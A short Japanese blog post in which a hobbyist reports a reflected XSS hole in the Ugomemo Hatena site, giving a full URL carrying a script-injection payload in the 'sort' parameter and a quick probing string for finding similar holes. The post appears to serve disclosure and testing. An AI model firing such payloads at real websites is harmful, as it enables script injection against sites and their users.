素人がプログラミングを勉強していたブログ

プログラミング、セキュリティ、英語、Webなどのブログ since 2008

連絡先: twitter: @javascripter にどうぞ。

うごメモはてなのXSS

うごメモはてな
はてなXSS脆弱性を発見したのでメモ。

http://ugomemo.hatena.ne.jp/movies?sort="><script>alert("XSS")</script>

XSSは、クエリの値に

xxx>\"'%0A

と入れて、Firefoxのソース表示でxxxで検索して壊れてる部分を探すとすぐ見つかる。
参考文献:
http://d.hatena.ne.jp/xor0x35/20090327/p1